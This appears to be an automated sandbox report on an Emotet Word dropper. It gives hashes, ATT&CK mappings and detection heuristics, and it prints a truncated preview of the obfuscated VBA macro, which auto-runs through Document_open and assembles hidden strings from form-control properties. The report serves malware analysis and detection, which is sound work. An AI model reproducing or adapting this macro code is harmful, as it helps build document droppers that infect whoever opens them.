Emotet Office (OLE) malware analysis — malicious · de169ea387921f82

MALICIOUS

Office (OLE)

246.2 KB Created: 2020-01-15 06:45:00 Authoring application: Microsoft Office Word First seen: 2020-06-01

MD5: d017bdae2916d6ec49ae1a3e9f9b3bb3 SHA-1: c1cebdf0882e77e33c0c774b37715f774d0ef59b SHA-256: de169ea387921f8260881d702a6ec1c957e9f2ae3ce0916c2c5f2e299489cbd4

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file contains VBA macros, specifically a Document_Open macro that utilizes GetObject, indicating an attempt to execute code upon opening. ClamAV detection confirms this as 'Doc.Dropper.Emotet-7540379-0', strongly suggesting Emotet family. The macro's execution is the primary mechanism for the attack, likely serving as a dropper for further malicious activity.

Heuristics 6

ClamAV: Doc.Dropper.Emotet-7540379-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Emotet-7540379-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11106 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11106 bytes
SHA-256: `33d1d9709a368cecb02b822283cf5be9908859333cbbbdaa41031a9775c7d065`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Idzgkexu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Bypjgawobclp End Sub Attribute VB_Name = "Jocckkat" Attribute VB_Base = "0{239F4D75-8614-4CF1-AE7B-A3FA909A1174}{F19137C5-7746-457F-8B41-F7CCA1DAF69B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Tffmpnoie" Function Crxlhbwozzslh() Do While Whpkbbrla = 9875 Do While Qbkummleadlz = 34 Zzzboshcuk = Cos(8 + CStr(750)) Loop Do While Ttwvqphp = 123 Qbsjhfgbkitb = Sjltlohz Trhenvrfvg = 3253 Loop Do While Jflcvtzfjrsud = 667 Oezmquip = CDbl(324) Coprngutuzfij = Int(496) Loop Do While Abzbznagrcb = 2342 Rdapudtfjovl = CInt(Jgygvhyq) Loop Do While Oqkbhxomka = 3247 Zpnfziqneqb = Sgn(713) Zsvfowblrbd = CByte(Xmzjbxythitq + Zeexoykifsh) Loop Loop Uvbnycbqgz = ChrW(wdKeyP) Do While Gpduekuw = 9875 Do While Jqxzpfjpmag = 34 Qzzuczfyhi = Cos(8 + CStr(750)) Loop Do While Irqphfalrjsn = 123 Mfcxgxigmufp = Frchdhgnsafuf Ggldinawjcvj = 3253 Loop Do While Wjrndfzhl = 667 Nynbrlswog = CDbl(324) Mjjfvseiyeiw = Int(496) Loop Do While Gbgrzvbtupn = 2342 Rdmnyipfduze = CInt(Bliqqkdfq) Loop Do While Hstspusaanelq = 3247 Cjchhnjozhm = Sgn(713) Kolnwrrqvmoag = CByte(Twargchucii + Dtkcvwplbrozs) Loop Loop Roqpvdjf = Uvbnycbqgz + Jocckkat.Gkjxrmfelbbs + Jocckkat.Pdjclczwohkb Do While Mxcajdmat = 9875 Do While Qtxbkxri = 34 Thhalkuvi = Cos(8 + CStr(750)) Loop Do While Hfrxzcgoed = 123 Anwdulgpxe = Qvaxtrelsqjn Kvluhbpw = 3253 Loop Do While Ogzkbdmcgy = 667 Bivnysrje = CDbl(324) Qakedxyduoojm = Int(496) Loop Do While Jpdghhxguczu = 2342 Exifjjkrzjfhv = CInt(Nziveicfxbp) Loop Do While Qbecufpqfddi = 3247 Pubzlkqhcqyz = Sgn(713) Rletqqbx = CByte(Npwyhvfn + Nlwbdidizne) Loop Loop Hnxweqsf = Split(Roqpvdjf + LTrim(LTrim(Jocckkat.Axgyuiuxich. _ Tag)), ",,,,sdf7&&jsad,,,") Do While Agjhhyzlt = 9875 Do While Zwukotwh = 34 Mtfjnknv = Cos(8 + CStr(750)) Loop Do While Nivuqwkelqe = 123 Sjvswaimycdom = Tompokmrbztrj Wxbvmzssrvwep = 3253 Loop Do While Getmlxeovofs = 667 Ciytbggmrqya = CDbl(324) Usfxmjtpywhy = Int(496) Loop Do While Gghhyzonx = 2342 Ykuncnkbiud = CInt(Fjznjcmcoy) Loop Do While Jrbxhhuvin = 3247 Bvjwxjncxyboz = Sgn(713) Vxlkmodt = CByte(Dbmjnzska + Sqefkdmlqnx) Loop Loop Crxlhbwozzslh = Kmvrywld + Join(Hnxweqsf, "") + Kmvrywld Do While Ovymhcvo = 9875 Do While Roqhrwhxls = 34 Rodptjxlv = Cos(8 + CStr(750)) Loop Do While Zsyjhfkwuykb = 123 Rnbyyuazieki = Mrmpaxqos Rbvhignm = 3253 Loop Do While Vvnxwqzk = 667 Zobkclvatbdun = CDbl(324) Seszyxvug = Int(496) Loop Do While Zrdgrdyobdzle = 2342 Mtvybhprdm = CInt(Vbdtvtgmex) Loop Do While Zwzwdstndn = 3247 Zhoojazu = Sgn(713) Cnxjeryjgpfk = CByte(Itnksthiq + Oescdxtahtmy) Loop Loop End Function Function Bypjgawo ... (truncated)

SHA-256: 33d1d9709a368cecb02b822283cf5be9908859333cbbbdaa41031a9775c7d065

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Idzgkexu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Bypjgawobclp
End Sub

Attribute VB_Name = "Jocckkat"
Attribute VB_Base = "0{239F4D75-8614-4CF1-AE7B-A3FA909A1174}{F19137C5-7746-457F-8B41-F7CCA1DAF69B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tffmpnoie"
Function Crxlhbwozzslh()
   Do While Whpkbbrla = 9875
      Do While Qbkummleadlz = 34
            Zzzboshcuk = Cos(8 + CStr(750))
      Loop
            Do While Ttwvqphp = 123
            Qbsjhfgbkitb = Sjltlohz
            Trhenvrfvg = 3253
      Loop
            Do While Jflcvtzfjrsud = 667
            Oezmquip = CDbl(324)
            Coprngutuzfij = Int(496)
      Loop
            Do While Abzbznagrcb = 2342
            Rdapudtfjovl = CInt(Jgygvhyq)
      Loop
            Do While Oqkbhxomka = 3247
            Zpnfziqneqb = Sgn(713)
            Zsvfowblrbd = CByte(Xmzjbxythitq + Zeexoykifsh)
      Loop
Loop
Uvbnycbqgz = ChrW(wdKeyP)
   Do While Gpduekuw = 9875
      Do While Jqxzpfjpmag = 34
            Qzzuczfyhi = Cos(8 + CStr(750))
      Loop
            Do While Irqphfalrjsn = 123
            Mfcxgxigmufp = Frchdhgnsafuf
            Ggldinawjcvj = 3253
      Loop
            Do While Wjrndfzhl = 667
            Nynbrlswog = CDbl(324)
            Mjjfvseiyeiw = Int(496)
      Loop
            Do While Gbgrzvbtupn = 2342
            Rdmnyipfduze = CInt(Bliqqkdfq)
      Loop
            Do While Hstspusaanelq = 3247
            Cjchhnjozhm = Sgn(713)
            Kolnwrrqvmoag = CByte(Twargchucii + Dtkcvwplbrozs)
      Loop
Loop
Roqpvdjf = Uvbnycbqgz + Jocckkat.Gkjxrmfelbbs + Jocckkat.Pdjclczwohkb
   Do While Mxcajdmat = 9875
      Do While Qtxbkxri = 34
            Thhalkuvi = Cos(8 + CStr(750))
      Loop
            Do While Hfrxzcgoed = 123
            Anwdulgpxe = Qvaxtrelsqjn
            Kvluhbpw = 3253
      Loop
            Do While Ogzkbdmcgy = 667
            Bivnysrje = CDbl(324)
            Qakedxyduoojm = Int(496)
      Loop
            Do While Jpdghhxguczu = 2342
            Exifjjkrzjfhv = CInt(Nziveicfxbp)
      Loop
            Do While Qbecufpqfddi = 3247
            Pubzlkqhcqyz = Sgn(713)
            Rletqqbx = CByte(Npwyhvfn + Nlwbdidizne)
      Loop
Loop
Hnxweqsf = Split(Roqpvdjf + LTrim(LTrim(Jocckkat.Axgyuiuxich. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Agjhhyzlt = 9875
      Do While Zwukotwh = 34
            Mtfjnknv = Cos(8 + CStr(750))
      Loop
            Do While Nivuqwkelqe = 123
            Sjvswaimycdom = Tompokmrbztrj
            Wxbvmzssrvwep = 3253
      Loop
            Do While Getmlxeovofs = 667
            Ciytbggmrqya = CDbl(324)
            Usfxmjtpywhy = Int(496)
      Loop
            Do While Gghhyzonx = 2342
            Ykuncnkbiud = CInt(Fjznjcmcoy)
      Loop
            Do While Jrbxhhuvin = 3247
            Bvjwxjncxyboz = Sgn(713)
            Vxlkmodt = CByte(Dbmjnzska + Sqefkdmlqnx)
      Loop
Loop
Crxlhbwozzslh = Kmvrywld + Join(Hnxweqsf, "") + Kmvrywld
   Do While Ovymhcvo = 9875
      Do While Roqhrwhxls = 34
            Rodptjxlv = Cos(8 + CStr(750))
      Loop
            Do While Zsyjhfkwuykb = 123
            Rnbyyuazieki = Mrmpaxqos
            Rbvhignm = 3253
      Loop
            Do While Vvnxwqzk = 667
            Zobkclvatbdun = CDbl(324)
            Seszyxvug = Int(496)
      Loop
            Do While Zrdgrdyobdzle = 2342
            Mtvybhprdm = CInt(Vbdtvtgmex)
      Loop
            Do While Zwzwdstndn = 3247
            Zhoojazu = Sgn(713)
            Cnxjeryjgpfk = CByte(Itnksthiq + Oescdxtahtmy)
      Loop
Loop
End Function
Function Bypjgawo
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.